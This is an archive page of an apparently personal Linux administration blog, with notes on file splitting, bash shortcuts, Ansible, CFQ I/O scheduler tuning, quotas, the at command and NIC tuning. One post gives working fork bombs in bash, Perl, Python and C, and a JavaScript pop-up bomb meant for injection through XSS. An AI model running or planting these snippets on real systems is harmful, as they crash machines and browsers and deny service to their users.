Monthly Archives: September 2013

split file into thousands of pieces

 

Multiply the total number of files times the size (in bytes). For example: If you want to create 10000 files that are 10 bytes each, do 10000 * 10 = 1,000,000. This represents the size of the master file that is needed.

dd if=/dev/zero of=testfike bs=1 count=1000000

split -b 10 -a 10 testfile

The -b option specifies the size in bytes of each file. The -a option defines the length of the filename of the new files +1 (-a 10 means create a 11 character long filename)

bash console shortcuts

Ctrl + A Go to the beginning of the line you are currently typing on
Ctrl + E Go to the end of the line you are currently typing on
Ctrl + L Clears the Screen, similar to the clear command
Ctrl + U Clears the line before the cursor position. If you are at the end of the line, clears the entire line.
Ctrl + H Same as backspace
Ctrl + R Let’s you search through previously used commands
Ctrl + C Kill whatever you are running
Ctrl + D Exit the current shell
Ctrl + Z Puts whatever you are running into a suspended background process. fg restores it.
Ctrl + W Delete the word before the cursor
Ctrl + K Clear the line after the cursor
Ctrl + T Swap the last two characters before the cursor
Esc + T Swap the last two words before the cursor
Alt + F Move cursor forward one word on the current line
Alt + B Move cursor backward one word on the current line
Tab Auto-complete files and folder names

about Ansible

Ansible is an open source IT configuration management, deployment, and
orchestration tool. It is unique from other management tools in many respects,
aiming to provide large productivity gains to a wide variety of automation
challenges. While Ansible provides more productive drop-in replacements
for many core capabilities in other automation solutions, it also seeks to solve
other major unsolved IT challenges by unifying configuration, deployment, and
complex IT process orchestration.
One of the most important challenges in this environment is to do all of the
above while providing a robust, easy to manage architecture–a problem that is
frequently not well solved in this application space. A management tool should
not impose additional demands on one’s environment–in fact, one should have
to think about it as little as possible. It should be transparent and maximize
productivity gains. Let’s see how Ansible achieves these gains using a unique
agentless architecture.

Bash fork() Bomb

: () { : | : & };:

it works by creating a large number of processes very quickly in order to saturate the available space in the list of processes kept by the operating system. If the process table becomes saturated, no new programs can start.

Some more forks:

An inline shell example using the Perl interpreter:

 perl -e "fork while fork" &

Using Python:

 import os

 while os.fork() or True: os.fork()

A more compact version of the above (which doesn’t check if os.fork exists)

 while 1: __import__("os").fork()

Or in C:

 #include <unistd.h>

 int main()
 {
   while(1)
     fork();
 }

JavaScript code that can be injected into a Web page via an XSS vulnerability exploit, resulting in a series of infinitely forking pop-up windows:

<script>
while (true) {
  var w = window.open();
  w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);
}
</script>

Ansible Secure and Agentless

Ansible relies on the most secure remote management system available as its default transport layer: OpenSSH. OpenSSH is available for a wide variety of platforms, is very lightweight, and as security issues in OpenSSH are discovered, they are patched quickly.

Further, Ansible does not require any remote agents. It delivers Ansible modules to remote systems and executes tasks, as needed, to enact the desired configuration. These modules run with user-supplied credentials, including support for sudo and even Kerberos, and clean up after themselves when complete. Ansible does not require root privileges, specific SSH keys, or dedicated users and respects the security model of the system under management.

As a result, Ansible has a very low attack surface area and is quite easy to bootstrap.

CFQ IO Scheduler tunning

CFQ IO Scheduler

Recall that the CFQ scheduler was written in response to some potential problems with the deadline controller. In particular, from an interview with Jens Axboe, the developer of CFQ, deadline, and a few other IO schedulers, Jens stated, “While deadline worked great from a latency and hard drive perspective, it had no concept of individual process fairness.” So one process that was doing a great deal of IO could cause other applications to have their IO starve.

The CFQ scheduler created the concept of having queues for each process. These queues are created as needed for a particular process. Also, while perhaps not new, the scheduler divided the concept of IO into two parts, Synchronous IO and Asynchronous IO (AIO). Synchronous IO is important because the application stops running until the IO request is finished. In other words, synchronous IO “blocks” the execution of the application until it is done. This is fairly common in read operations because an application may need to read some input data prior to continuing execution.

On the other hand, AIO allows an application to continue operation because the result of the IO operation returns immediately. So rather than wait for confirmation that the application’s IO request has succeeded as in the case of synchronous IO, for AIO the result is returned immediately even if the IO operation has not yet finished. This is potentially very useful for write operations and allows the application to overlap IO with computation (helps efficiency – that is, it can improve run time).

CFQ was designed to separate out synchronous and asynchronous IO operations, favoring synchronous operations (naturally). It also favors read operations for a couple of reasons: (1) reads have a tendency to block execution because the application needs the data to continue, (2) it’s possible with the elevator approach for schedulers to “starve” a read operation that is fairly far out on disk geometry (near the outside of the disk). By favoring read operations it improves read responsiveness and greatly reduces the possibility of a far-out read starvation.

CFQ goes even further by keeping the concept of deadlines from the Deadline IO Scheduler to prevent IO operations from being starved. Jens’ wrote the deadline scheduler and realized that for good performance for some applications it needed the concept of an IO operation “timing out.” That is, an IO operation may be put into a queue for execution but subsequent IO operations may be put ahead of it in the queue. Therefore the IO request at the end of the queue may never get executed or it’s execution may be seriously delayed. The deadline IO scheduler has the concept of a “time-out” period. If the IO request is not executed in during this period, it will be executed immediately. This keeps IO operations from starving in the queue.

Jens combined all of these concepts along with the per-process concept to create CFQ. It can be rather complicated to define exactly how these concepts interact and it’s beyond this article to go into detail, but understanding the concepts that go into CFQ are very important. This is particularly important if we are going to try tuning the scheduler for performance.

 

Tunable Parameters in CFQ

In addition to open-source being a great way to have access to the code to make changes yourself to adapt it to your requirements, many times the developers of software allowing you to “tune” the application for your situation without having to hack the code base yourself. The IO schedulers in the Linux kernel are no exception. In particular, the CFQ scheduler has 9 parameters for tuning performance. While discussing the parameters can get long, it is worthwhile to take a look at these parameters in a bit more depth:

  1. back_seek_max
    This parameter, given in Kbytes, sets the maximum “distance” for backward seeking. By default, this parameter is set to 16 MBytes. This distance is the amount of space from the current head location to the sectors that are backward in terms of distance. This idea comes from the Anticipatory Scheduler (AS) about anticipating the location of the next request. This parameter allows the scheduler to anticipate requests in the “backward” or opposite direction and consider the requests as being “next” if they are within this distance from the current head location.
  2. back_seek_penalty
    This parameter is used to compute the cost of backward seeking. If the backward distance of a request is just (1/back_seek_penalty) from a “front” request, then the seeking cost of the two requests is considered equivalent and the scheduler will not bias toward one or the other (otherwise the scheduler will bias the selection to “front direction requests). Recall, the CFQ has the concept of elevators so it will try to seek in the current direction as much as possible to avoid the latency associated with a seek. This parameters defaults to 2 so if the distance is only 1/2 of the forward distance, CFQ will consider the backward request to be close enough to the current head location to be “close”. Therefore it will consider it as a forward request.
  3. fifo_expire_async
    This particular parameter is used to set the timeout of asynchronous requests. Recall that CFQ maintains a fifo (first-in, first-out) list to manage timeout requests. In addition, CFQ doesn’t check the expired requests from the fifo queue after one timeout is dispatched (i.e. there is a delay in processing the expired request). The default value for this parameter is 250 ms. A smaller value means the timeout is considered much more quickly than a larger value.
  4. fifo_expire_sync
    This parameter is the same as fifo_expire_async but for synchronous requests. The default value for this parameter is 125 ms. If you want to favor synchronous request over asynchronous requests, then this value should be decreased relative to fifo_expire_asynchronous.
  5. slice_sync
    Remember that when a queue is selected for execution, the queues IO requests are only executed for a certain amount of time (the time_slice) before switching to another queue. This parameter is used to calculate the time slice of the synchronous queue. The default value for this parameter is 100 ms, but this isn’t the true time slice. Rather the time slice is computed from the following: time_slice = slice_sync + (slice_sync / 5 * 4 – io_priority)). If you want the time slice for the synchronous queue to be longer (perhaps you have more synchronous operations), then increase the value of slice_sync.
  6. slice_async
    This parameter is the same as slice_sync but for the asynchronous queue. The default is 40 ms. Notice that synchronous operations are preferred over asynchronous operations.
  7. slice_asyn_rq
    This parameter is used to limit the dispatching of asynchronous requests to the device request-queue in queue’s slice time. This limits the number of asynchronous requests are executed (dispatched). The maximum number of requests that are allowed to be dispatched also depends upon the io priority. The equations for computing the maximum number of requests is, max_nr_requests = 2 * (slice_async_rq + slice_async_rq * (7 – io_priority)). The default for slice_async_rq is 2.
  8. slice_idle
    This parameter is the idle time for the synchronous queue only. In a queue’s time slice (the amount of time operations can be dispatched), when there are no requests in the synchronous queue CFQ will not switch to another queue but will sit idle to wait for the process creating more requests. If there are no new requests submitted within the idle time, then the queue will expire. The default value for this parameter is 8 ms. This parameters can control the amount of time the schedulers waits for synchronous requests. This can be important since synchronous requests tend to block execution of the process until the operation is completed. Consequently, the IO scheduler looks for synchronous requests within the idle window of time that might come from a streaming video application or something that needs synchronous operations.
  9. quantum
    This parameter controls the number of dispatched requests to the device queue, request-device (i.e. the number of requests that are executed or at least sent for execution). In a queue’s time slice, a request will not be dispatched if the number of requests in the device request-device exceeds this parameter. For the asynchronous queue, dispatching the requests is also restricted by the parameter slice_async_rq. The default for this parameter is 4.

You can see that the CFQ scheduler prefers synchronous IO requests. The reason for this is fairly simple – synchronous IO operations block execution. So until that IO operation is executed the application cannot continue to run. These applications can include streaming video or streaming audio (who wants their movie or music to be interrupted?), but there are a great deal more applications that perform synchronous IO.

 

On the other hand, Asynchronous IO (AIO) can be very useful because execution immediately returns to the application immediately without waiting for confirmation that the operation has completed. This allows the application to “overlap” computation and IO. This can be very useful for many operations depending upon the goals and requirements. There is quite a good article that talks about synchronous and asynchronous and blocking and non-blocking IO requests.

This article from: http://www.linux-mag.com/id/7572/

Linux I/O Scheduler

I/O scheduling controls how input/output operations will be submitted to storage.

The Completely Fair Queuing (CFQ) scheduler is the default algorthim in Red Hat Enterprise Linux and RHE family OS like Centos/Fedora and etc.. As the name implies, CFQ maintains a scalable per-process I/O queue and attempts to distribute the available I/O bandwidth equally among all I/O requests. CFQ is well suited for mid-to-large multi-processor systems and for systems which require balanced I/O performance over multiple LUNs and I/O controllers.

The Deadline elevator uses a deadline algorithm to minimize I/O latency for a given I/O request. The scheduler provides near real-time behavior and uses a round robin policy to attempt to be fair among multiple I/O requests and to avoid process starvation. Using five I/O queues, this scheduler will aggressively re-order requests to improve I/O performance.

The NOOP scheduler is a simple FIFO queue and uses the minimal amount of CPU/instructions per I/O to accomplish the basic merging and sorting functionality to complete the I/O. It assumes performance of the I/O has been or will be optimized at the block device (memory-disk) or with an intelligent HBA or externally attached controller.

The Anticipatory elevator introduces a controlled delay before dispatching the I/O to attempt to aggregate and/or re-order requests improving locality and reducing disk seek operations. This algorithm is intended to optimize systems with small or slow disk subsystems. One artifact of using the AS scheduler can be higher I/O latency.

cat /sys/block/sda/queue/scheduler

noop deadline [cfq]

cfq is default on Fedora 19, I mean my current OS 🙂

If you want to change scheduler: echo noop > /sys/block/sda/queue/scheduler

 

A little bit more:

  • noop is often the best choice for memory-backed block devices (e.g. ramdisks) and other non-rotational media (flash) where trying to reschedule I/O is a waste of resources
  • as (anticipatory) is conceptually similar to deadline, but with more heuristics that often improve performance (but sometimes can decrease it)
  • deadline is a lightweight scheduler which tries to put a hard limit on latency
  • cfq tries to maintain system-wide fairness of I/O bandwidth

The default was anticipatory for a long time, and it received a lot of tuning. cfq became the default some while ago, as its performance is reasonable and fairness is a good goal for multi-user systems (and even single-user desktops). For some scenarios — databases are often used as examples, as they tend to already have their own peculiar scheduling and access patterns, and are often the most important service (so who cares about fairness?) — anticipatory has a long history of being tunable for best performance on these workloads, and deadline very quickly passes all requests through to the underlying device.

 

MySQL database size limit

The effective maximum table size for MySQL databases is usually determined by operating system constraints on file sizes, not by MySQL internal limits. The following table lists some examples of operating system file-size limits. This is only a rough guide and is not intended to be definitive. For the most up-to-date information, be sure to check the documentation specific to your operating system.

Operating System File-size Limit
Win32 w/ FAT/FAT32 2GB/4GB
Win32 w/ NTFS 2TB (possibly larger)
Linux 2.2-Intel 32-bit 2GB (LFS: 4GB)
Linux 2.4+ (using ext3 file system) 4TB
Solaris 9/10 16TB
MacOS X w/ HFS+ 2TB
NetWare w/NSS file system 8TB

Verify DNS SRV Records

 

host -t SRV _some_service._tcp.yourdomain.com
_some_service._tcp.yourdomain.com has SRV record 100 1 5061 target_hostname.

where: 100 -priority; 1 weight; 5061 port
c:\> nslookup
> set type=any
> set verbose
> _some_service._tcp.yourdomain.com
_some_service._tcp.yourdomain.com      SRV service location:
          priority       = 100
          weight         = 1
          port           = 5061
          svr hostname   = target_hostname

Centos/RHEL enable user quota

Quota is useful for limiting the disk usage for users or groups.

###To verify that the quota is enabled in the kernel###
#grep CONFIG_QUOTA /boot/config-`uname -r`
CONFIG_QUOTA=y
CONFIG_QUOTA_NETLINK_INTERFACE=y
# CONFIG_QUOTA_DEBUG is not set
CONFIG_QUOTA_TREE=y
CONFIG_QUOTACTL=y
[root@rajat rajat]#
Create user :
useradd some_user
passwd latarEdit /etc/fstab :
From :
/dev/sdaX /home ext3 defaults 1 2
To :
/dev/sdaX /home ext3 defaults,usrquota,grpquota 1 2Remount the disk (make sure it’s not in use) :
mount -o remount /home

Check if usrquota and grpquota are enabled :
mount | grep /home

Create quota files :
quotacheck -cvug /home

This creates /home/aquota.user and /home/aquota.group

Check quota :
#quotacheck -avug

Enable quota for user1 :

edquota user1
Edit soft and hard limits (1000 = 1 MB) or inode values.

Check the quota for user1 :
quota user1

Enable quota :
quotaon -avug

In addition :

Through a cron, run everynight when the filesystem is not used :
quotaoff -avug && quotacheck -avug && quotaon –avug

Get quota stats :
repquota -a

at Command Syntax

Example Meaning
at noon 12:00 PM September 18, 2001
at midnight 12:00 AM September 19, 2001
at teatime 4:00 PM September 18, 2001
at tomorrow 10:00 AM September 19, 2001
at noon tomorrow 12:00 PM September 19, 2001
at next week 10:00 AM September 25, 2001
at next monday 10:00 AM September 24, 2001
at fri 10:00 AM September 21, 2001
at OCT 10:00 AM October 18, 2001
at 9:00 AM 9:00 AM September 19, 2001
at 2:30 PM 2:30 PM September 18, 2001
at 1430 2:30 PM September 18, 2001
at 2:30 PM tomorrow 2:30 PM September 19, 2001
at 2:30 PM next month 2:30 PM October 18, 2001
at 2:30 PM Fri 2:30 PM September 21, 2001
at 2:30 PM 9/21 2:30 PM September 21, 2001
at 2:30 PM Sept 21 2:30 PM September 21, 2001
at 2:30 PM 9/21/2010 2:30 PM September 21, 2010
at 2:30 PM 21.9.10 2:30 PM September 21, 2010
at now + 30 minutes 10:30 AM September 18, 2001
at now + 1 hour 11:00 AM September 18, 2001
at now + 2 days 10:00 AM September 20, 2001
at 4 PM + 2 days 4:00 PM September 20, 2001
at now + 3 weeks 10:00 AM October 9, 2001
at now + 4 months 10:00 AM January 18, 2002
at now + 5 years 10:00 AM September 18, 2007

ACL

This is controlled by a pair of files called at.allow and at.deny.  The location and even the exact use of these files vary from system to system.  For Linux these file exists in /etc.  On Linux:

  • If neither file exists then only the user root can use the at command.
  • If only at.deny exists, then any user except those listed in this file can use the at command.
  • If at.allow exists then only users listed in this file can use the at command.  Note if this file exists then any at.deny file is ignored.

To see a list of pending at jobs (the ones that haven’t run yet), use the command “atq“.  This will show the job number and date-time for that job.

To see the contents of some at job, use the command “at -c jobnum“.  This shows the complete environment that gets set for the job as well; the actual commands of your job are at the bottom.

To delete an at job before it has run, use the command atrm jobnum“.

An at job may be created in a particular queue, using the form “at -q queue date-time“.  The queue is a single letter.  The default queue is “a“.  Queue “b” is reserved for batch jobs.  Using higher lettered queues will run your at job with higher nice values.

packets loss on NIC interface

Default settings for NICs is good for most cases however there are times when you need to do some performance tuning.
When you start to observe increasing drops of RX packets it means that your system cannot process incoming packets fast enough. You can verify on your monitoring system to correlate this issue with increased network traffic at the same time.
# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:22:19:50:ea:76
inet addr:192.168.x.x  Bcast:192.168.x.x  Mask:255.255.xxx.xxx
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:3208932 errors:0 dropped:19188 overruns:0 frame:0
TX packets:1543138 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000First verify current NIC settings:
# ethtool -g eth0
Ring parameters for eth0:
Pre-set maximums:
RX:             1020
RX Mini:        0
RX Jumbo:       4080
TX:             255
Current hardware settings:
RX:             255
RX Mini:        0
RX Jumbo:       0
TX:             255

Increasing ring buffer for rx should fix this issue:
# ethtool -G eth0 rx 512

To have this settings persistent make sure you add this command to /etc/rc.local script.